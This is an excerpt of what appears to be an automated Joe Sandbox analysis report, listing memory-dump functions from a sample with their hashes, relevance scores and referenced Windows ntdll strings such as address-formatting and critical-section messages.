Function 00416CEB Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372076651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_GCeHcfCef8.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23f7d22a133096a1b046eeaa3b4b29fa3f95a52c58417640bdba188bdba4878a
Instruction ID: 0eec78562824e58bf4331be21e3ccd91a7fc1c7a0d83e70eb26db6357782b9c8
Opcode Fuzzy Hash: 23f7d22a133096a1b046eeaa3b4b29fa3f95a52c58417640bdba188bdba4878a
Instruction Fuzzy Hash: 69B09226F590590449111C0878410F8FB35888B02AF1032D3D84CB74018102C419018A

Uniqueness

Uniqueness Score: -1.00%

Function 0171C700 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction ID: 8cc781949e127312ab9f3f900b2e3024eb0500d14d1117055e5e7725b2d7fa80
Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
Instruction Fuzzy Hash: 27C08033150644AFC711DF95CD01F0177A9F798B40F010025F30447670C531FC10D644

Uniqueness

Uniqueness Score: -1.00%

Function 01700310 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: 4637ad7b0f774b00ae9aec311c56d2a5d472eda7fc27b5ffb1d8fd89cf8751d2
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 95D01236100248EFCB02DF41C890E9AB76AFBD8750F108019FD1907650CA31ED62DA50

Uniqueness

Uniqueness Score: -1.00%

Function 016E0750 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: 26f512e24f073e6cc03ea1feffe0d1f88a730b4274e3b2dbc936f6d2e54c3fb5
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 09C0487A701A468FCF16DB2AD794F49B7E4FB84740F150894E905CBB22EA24E801CA10

Uniqueness

Uniqueness Score: -1.00%

Function 01724340 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f21fd190bec8f3a7188dc01466822f3acbb9c0ac212994293cb800939da5c2f
Instruction ID: 68239322c17c65b35c574ac1faf765270f462a06c741a8113a1c0b233847e068
Opcode Fuzzy Hash: 3f21fd190bec8f3a7188dc01466822f3acbb9c0ac212994293cb800939da5c2f
Instruction Fuzzy Hash: BB900231609800129240715848845468015A7E0301B55C121F0828564DCA248B576362

Uniqueness

Uniqueness Score: -1.00%

Function 01724650 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c12c719b174b451fc453e483f55f2d67cd9da8aebbe0075e2ad561e3013fbe5e
Instruction ID: bcea4d89134e685c1190b749e763d2ad861f0fe1a48efddf79fd42aa2dc930aa
Opcode Fuzzy Hash: c12c719b174b451fc453e483f55f2d67cd9da8aebbe0075e2ad561e3013fbe5e
Instruction Fuzzy Hash: AC90026160550042424071584804406A015A7E1301395C225B0958570DC6288A56A36A

Uniqueness

Uniqueness Score: -1.00%

Function 01722BE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6007e4976e5308f79f5ffe913c94c01c3721c97cc89bd42e4e4a0d958d1aad52
Instruction ID: fc6ce42b6aae66e6a7ed271b2afe64f57ef16f644e6c47e483dab2bae920ddef
Opcode Fuzzy Hash: 6007e4976e5308f79f5ffe913c94c01c3721c97cc89bd42e4e4a0d958d1aad52
Instruction Fuzzy Hash: B190023120944842D24071584404A46402597D0305F55C121B04686A4ED6358F56B762

Uniqueness

Uniqueness Score: -1.00%

Function 01722BA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 104551158da144d6b465e73f55bb0e9b42c919b319d6dbe34f554dcfcbb91317
Instruction ID: 1ce2e310bd9fe4eacde1d8ae4f528b2b356157c8ffbab89abbfd5b05de9e0892
Opcode Fuzzy Hash: 104551158da144d6b465e73f55bb0e9b42c919b319d6dbe34f554dcfcbb91317
Instruction Fuzzy Hash: 5F90023160940802D25071584414746401597D0301F55C121B0428664EC7658B5677A2

Uniqueness

Uniqueness Score: -1.00%

Function 01722B80 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 276c5a0a2ecd26e1ed929a8c213e1654cddd01a568a7026e1c01cf9a7db16a2f
Instruction ID: 2719e2467cc597b850f8f2f708ee246a0f3f80177ec1ad5c0b85e78d5cb6bb79
Opcode Fuzzy Hash: 276c5a0a2ecd26e1ed929a8c213e1654cddd01a568a7026e1c01cf9a7db16a2f
Instruction Fuzzy Hash: DA90023120540802D20471584804686401597D0301F55C121B6428665FD6758A927232

Uniqueness

Uniqueness Score: -1.00%

Function 01722AF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4af55608923f760590764406c1dcacdfb21e2fe0926a2282920be75efd9da2
Instruction ID: 1fa31c6ff6592aff5c0ef23a748614608cacb2f2b61a39edd8b3626b62fd2720
Opcode Fuzzy Hash: ce4af55608923f760590764406c1dcacdfb21e2fe0926a2282920be75efd9da2
Instruction Fuzzy Hash: 9B900225225400020245B558060450B4455A7D6351395C125F181A5A0DC6318A666322

Uniqueness

Uniqueness Score: -1.00%

Function 01722AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00bb8aa23906b39c12f9928d72c060286f1f18aae2fe44ba6f0c5a6fb48c2917
Instruction ID: c8e8588aa9fd29f663338f43443a0f4f90f83857870f4b26acf28a2127f23525
Opcode Fuzzy Hash: 00bb8aa23906b39c12f9928d72c060286f1f18aae2fe44ba6f0c5a6fb48c2917
Instruction Fuzzy Hash: 719002A1205540924600B2588404B0A851597E0201B55C126F1458570DC5358A52A236

Uniqueness

Uniqueness Score: -1.00%

Function 01722D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d02ae572a50fc33286d60c63f063eb02f0782e5bf472a8be99ec145f52e2986
Instruction ID: dcf2f19eda62623745e79306207a441121e555b4a1068075ee79cbd541fc5ead
Opcode Fuzzy Hash: 6d02ae572a50fc33286d60c63f063eb02f0782e5bf472a8be99ec145f52e2986
Instruction Fuzzy Hash: 8790022120944442D20075585408A06401597D0205F55D121B14685A5EC6358A52B232

Uniqueness

Uniqueness Score: -1.00%

Function 01722DB0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb03ff48f3c07634034d49707dbbaffed6cf3040908c8127745b9586c732294
Instruction ID: da7f5545127eb7c3c00a4989679945fa31969c8c744eca63d73532f8cb3887a6
Opcode Fuzzy Hash: beb03ff48f3c07634034d49707dbbaffed6cf3040908c8127745b9586c732294
Instruction Fuzzy Hash: 6E90023124540402D241715844046064019A7D0241F95C122B0828564FC6658B57BB62

Uniqueness

Uniqueness Score: -1.00%

Function 01722C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680e46f1a1b1c030969391838c556defb3c6be7be5ccd5ad7853a33a4bff047c
Instruction ID: f5274564aebb3131f11f6c1dda2a6620e9a251d88b67dad0f17ba000356d1aa5
Opcode Fuzzy Hash: 680e46f1a1b1c030969391838c556defb3c6be7be5ccd5ad7853a33a4bff047c
Instruction Fuzzy Hash: 6B90023120540842D20071584404B46401597E0301F55C126B0528664EC625CA527622

Uniqueness

Uniqueness Score: -1.00%

Function 01722CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4107f89c3a4e02edecf81d13e89025552746ec46e4c3a7071785fb80d57a2530
Instruction ID: 1c4fb20b545771d833886c5681652b9220bd635760a52ec4f278c158aa18800c
Opcode Fuzzy Hash: 4107f89c3a4e02edecf81d13e89025552746ec46e4c3a7071785fb80d57a2530
Instruction Fuzzy Hash: D890023120540403D20071585508707401597D0201F55D521B0828568ED6668A527222

Uniqueness

Uniqueness Score: -1.00%

Function 01722CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74b081b1ccf54e33f379fdc0050555db02228c75d645be31c6003a1273105b80
Instruction ID: 10a83119cddc128172a0693bfa3c5ede67944fb5e81e8bdb3ff608659148a6a1
Opcode Fuzzy Hash: 74b081b1ccf54e33f379fdc0050555db02228c75d645be31c6003a1273105b80
Instruction Fuzzy Hash: 4D90022160940402D24071585418706402597D0201F55D121B0428564EC6698B5677A2

Uniqueness

Uniqueness Score: -1.00%

Function 01722F60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4026678eabe374e2725d17f4c975c83d6c197bf696708a2ccbb305181336329a
Instruction ID: 9ea05b165cc147195268a2af73e90105168b8d3d8fff50f9a0ebd594a7cdd941
Opcode Fuzzy Hash: 4026678eabe374e2725d17f4c975c83d6c197bf696708a2ccbb305181336329a
Instruction Fuzzy Hash: B390026121540042D20471584404706405597E1201F55C122B2558564DC5398E626226

Uniqueness

Uniqueness Score: -1.00%

Function 01722FA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae6652e3e2ed50355ac34c41a4f3a829fa2cb8041e381bed0155240912676a7b
Instruction ID: 1fa8679e33042b65bade9e6f8f37b4ebec0be41bb43a7ccd3a498166989b92a5
Opcode Fuzzy Hash: ae6652e3e2ed50355ac34c41a4f3a829fa2cb8041e381bed0155240912676a7b
Instruction Fuzzy Hash: D790023120580402D20071584808747401597D0302F55C121B5568565FC675CA927632

Uniqueness

Uniqueness Score: -1.00%

Function 01722E30 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13e8c6dc8c92be84ce935fbfbb2b1dec1ac696fef828b69dd4bbf3a6e81c1e79
Instruction ID: a7093a7d4199a084ca8d27b9ebe27553fd1a99f39c6b0d60ca914600fcd570f1
Opcode Fuzzy Hash: 13e8c6dc8c92be84ce935fbfbb2b1dec1ac696fef828b69dd4bbf3a6e81c1e79
Instruction Fuzzy Hash: 1890022130540402D202715844146064019D7D1345F95C122F1828565EC6358B53B233

Uniqueness

Uniqueness Score: -1.00%

Function 01722EE0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdb4fc9ef610006f553357b81b25a24d4a34577d7e0e0cf38131b9bd9da334c3
Instruction ID: c7ed6d04317435b4c8eccfc9eeb5008bb4f7e926e914b28f2e2f0ccae269792b
Opcode Fuzzy Hash: fdb4fc9ef610006f553357b81b25a24d4a34577d7e0e0cf38131b9bd9da334c3
Instruction Fuzzy Hash: 3790026120580403D24075584804607401597D0302F55C121B2468565FCA398E527236

Uniqueness

Uniqueness Score: -1.00%

Function 01723010 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b6a54fb96583cc2706f2e66a6fac864c1c8eb5c213b074af715aabe76f0ae4d
Instruction ID: 2e1a85dfa57c25a140d166ffea0809225342673a90038bffaf0bb33a7114cb03
Opcode Fuzzy Hash: 2b6a54fb96583cc2706f2e66a6fac864c1c8eb5c213b074af715aabe76f0ae4d
Instruction Fuzzy Hash: 6090022120584442D24072584804B0F811597E1202F95C129B455A564DC9258A566722

Uniqueness

Uniqueness Score: -1.00%

Function 01723090 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782015879c69e78ebfca22a01cd8cae6efb902eb88897fc7b5b00554b9021be6
Instruction ID: c7b7ef8df28071897b6e26d20d984bd0688ec2ab9ecdd5f9e9fac2559b699a30
Opcode Fuzzy Hash: 782015879c69e78ebfca22a01cd8cae6efb902eb88897fc7b5b00554b9021be6
Instruction Fuzzy Hash: A590022124540802D240715884147074016D7D0601F55C121B0428564EC6268B6677B2

Uniqueness

Uniqueness Score: -1.00%

Function 017235C0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb853077c4436e38d6c172c8717c8d92a62f17b6bb6753a82c57c2b4b4d91fa3
Instruction ID: a5f9be19a7a0199f586f7a851576606422cc77af9038356e62bce5adcd48e779
Opcode Fuzzy Hash: eb853077c4436e38d6c172c8717c8d92a62f17b6bb6753a82c57c2b4b4d91fa3
Instruction Fuzzy Hash: 7390023160950402D20071584514706501597D0201F65C521B0828578EC7A58B5276A3

Uniqueness

Uniqueness Score: -1.00%

Function 017239B0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a8efece63aff2138a5a3f7f88b509b3a9d7d8df2333ea281defef1f54d9089
Instruction ID: ffaa733a1315e771a45c3d645a9bcf320543d7f146274da86c486a6cbbf7d86d
Opcode Fuzzy Hash: f0a8efece63aff2138a5a3f7f88b509b3a9d7d8df2333ea281defef1f54d9089
Instruction Fuzzy Hash: 9890022124945102D250715C44046168015B7E0201F55C131B0C185A4EC5658A567322

Uniqueness

Uniqueness Score: -1.00%

Function 01723D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d57a173e7c2aa88969a20184cbfb55485613142d36ff21d854a2f6a29e3607fa
Instruction ID: 56eaa978ec11c92422fde0f7182dbbe6a52a4dbb80a5af284abb80aa06f75734
Opcode Fuzzy Hash: d57a173e7c2aa88969a20184cbfb55485613142d36ff21d854a2f6a29e3607fa
Instruction Fuzzy Hash: FE90023520540402D61071585804646405697D0301F55D521B0828568EC6648AA2B222

Uniqueness

Uniqueness Score: -1.00%

Function 01723D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17df0c7a06a18bdd4bbc8a10920ae0e602b44b6a6604154fd58987b8546e2a8
Instruction ID: e2fe65a4f4d93b372368ae39c4e512e11998771e5317bb1659b22b912575fa3d
Opcode Fuzzy Hash: b17df0c7a06a18bdd4bbc8a10920ae0e602b44b6a6604154fd58987b8546e2a8
Instruction Fuzzy Hash: 0B90023120640142964072585804A4E811597E1302B95D525B0419564DC9248A626322

Uniqueness

Uniqueness Score: -1.00%

Function 01722C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 0953ac074b5d5e03b1541020d3112ff905d7c36fc5a1d2a93ce40f8272af59ff
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01722890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0172293C
___swprintf_l.LIBCMT ref: 0172295E
___swprintf_l.LIBCMT ref: 017229A3
___swprintf_l.LIBCMT ref: 0175A52E

Strings

:%u.%u.%u.%u, xrefs: 0175A5B8
ffff:, xrefs: 0175A504
::ffff:0:%u.%u.%u.%u, xrefs: 0175A54E
::%hs%u.%u.%u.%u, xrefs: 0175A527

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 3d9276700407fdc7c3ed9bc83d7d04018f4de2d181a0e7be7beb62560ae8be8b
Instruction ID: 949c6bbc00fde1758d3f5742f8d8de542e08d1fdd3ebcf8a93172f653784db72
Opcode Fuzzy Hash: 3d9276700407fdc7c3ed9bc83d7d04018f4de2d181a0e7be7beb62560ae8be8b
Instruction Fuzzy Hash: 4D5108B2B04126BFCB21DFAC889097EFBB8BB482407548269F4A5D7642D774DE41C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 01792410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 017924A6
___swprintf_l.LIBCMT ref: 017924E2
___swprintf_l.LIBCMT ref: 0179257D
___swprintf_l.LIBCMT ref: 017925A3
___swprintf_l.LIBCMT ref: 017925C8
___swprintf_l.LIBCMT ref: 01792608

Strings

ffff:, xrefs: 0179247D, 0179249D
:%u.%u.%u.%u, xrefs: 017925FF
::ffff:0:%u.%u.%u.%u, xrefs: 017924DA
::%hs%u.%u.%u.%u, xrefs: 0179249E

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 29f4720acfbf07482cb30bf990d5da04858b122b28c8e43e17185b198ef08d46
Instruction ID: 41d3bfc7a0a058c7905b852a9f9622b3edf251466047ea64b40d3aca19b8c300
Opcode Fuzzy Hash: 29f4720acfbf07482cb30bf990d5da04858b122b28c8e43e17185b198ef08d46
Instruction Fuzzy Hash: B951F4B1A00645BECF30EF9DD89097FFBF8AB44200B148499E596C7683EA74DE448760

Uniqueness

Uniqueness Score: -1.00%

Function 01717630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 017546A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01754725
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01754742
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01754655
CLIENT(ntdll): Processing section info %ws..., xrefs: 01754787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 017546FC
Execute=1, xrefs: 01754713

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 2b5060ba4ad8a2f0b3d2e0e1ec0cb4724113b06a9c2c8f73a2a13fb4e38dbf82
Instruction ID: 833f3fd74d5866ef0e909d889074a5793f357afe752f6323371b41c6cb8598b3
Opcode Fuzzy Hash: 2b5060ba4ad8a2f0b3d2e0e1ec0cb4724113b06a9c2c8f73a2a13fb4e38dbf82
Instruction Fuzzy Hash: AA511A3160021AAAEF15ABADDC99FBDF7B8EF15710F0404DDEA06A7185EB709E418F50

Uniqueness

Uniqueness Score: -1.00%

Function 0172B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0172B6BF

Strings

0, xrefs: 0172B695
+, xrefs: 0172B65A
-, xrefs: 0172B650
0, xrefs: 0172B66F

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction ID: 92ce2539cb595a3fe88e400718c096bd1050def57447df32ab432122eb005a49
Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
Instruction Fuzzy Hash: 7E81F270E452698EEF25CF6CC8907FEFBB2AF45320F18415AD861A7392C7749842CB51

Uniqueness

Uniqueness Score: -1.00%

Function 017920E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0179214F
___swprintf_l.LIBCMT ref: 01792172

Strings

[, xrefs: 0179212B
]:%u, xrefs: 01792169
%%%u, xrefs: 01792146

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_16b0000_GCeHcfCef8.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 85d059d128ffa54a834328016595b1ad338541aa0eb612bf688ec480c2ab5ea8
Instruction ID: 4ea3efa7cc46a85a9e3b2bd8772c990414b3d0b431627f1fdbcc0312e1ccfd4e
Opcode Fuzzy Hash: 85d059d128ffa54a834328016595b1ad338541aa0eb612bf688ec480c2ab5ea8
Instruction Fuzzy Hash: 732177BAE00119ABDB10EF79EC44AFEFBF9EF54650F140116E945D3205E730D9158BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0170F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017502BD
RTL: Re-Waiting, xrefs: 0175031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017502E7

Memory Dump Source

Source File: 00000002.00000002.1372617991.00000000016B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016B0000, based on PE: true

Joe Sandbox IDA Plugin

